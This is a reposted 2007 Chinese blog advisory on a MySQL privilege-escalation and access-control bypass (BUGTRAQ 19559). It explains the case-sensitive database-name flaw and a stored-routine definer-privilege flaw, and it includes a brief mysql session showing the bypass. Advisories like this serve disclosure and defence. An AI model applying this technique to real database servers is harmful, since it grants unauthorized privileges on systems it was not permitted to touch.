MySQL許可權提升及安全限制繞過漏洞(轉)

ba發表於2007-08-16
MySql
MySQL許可權提升及安全限制繞過漏洞(轉)[@more@]受影響系統:

MySQL AB MySQL <= 5.1.10

描述:BUGTRAQ ID: 19559

MySQL是一款使用非常廣泛的開放原始碼關聯式資料庫系統,擁有各種平臺的執行版本。在MySQL上,擁有訪問許可權但無建立許可權的使用者可以建立與所訪問資料庫僅有名稱字母大小寫區別的新資料庫。成功利用這個漏洞要求執行MySQL的檔案系統支援區分大小寫的檔名。

此外,由於在錯誤的安全環境中計算了suid例程的引數,攻擊者可以透過儲存的例程以例程定義者的許可權執行任意DML語句。成功攻擊要求使用者對所儲存例程擁有EXECUTE許可權。

測試方法:

警 告:以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!

1 建立資料庫
CODE:
$ mysql -h my.mysql.server -u sample -p -A sample
Enter password:
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 263935 to server version: 4.1.16-standard

mysql> create database another;
ERROR 1044: Access denied for user 'sample'@'%' to database 'another'

mysql> create database sAmple;
Query OK, 1 row affected (0.00 sec)

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10617731/viewspace-960811/,如需轉載,請註明出處,否則將追究法律責任。

0
0
上一篇: MySQL資料庫中修改密碼方法總結(轉)
下一篇: 七種武器-----讓你的電腦變得更安全v(轉)
MySQL許可權提升及安全限制繞過漏洞(轉)
請登入後發表評論 登入
全部評論
ba
  • 博文量
    1621
  • 訪問量
    4304215

最新文章

支援我們 作者招募 使用者協議 FAQ Contact Us

北京盛拓優訊資訊科技有限公司. 版權所有  京ICP備16024965號-8 北京市公安局海淀分局網監中心備案編號:11010802021510 niuxiaotong@pcpop.com 17352615567 未成年人舉報專區

廣播電視節目製作經營許可證(京) 字第1234號 中國網際網路協會會員

相關文章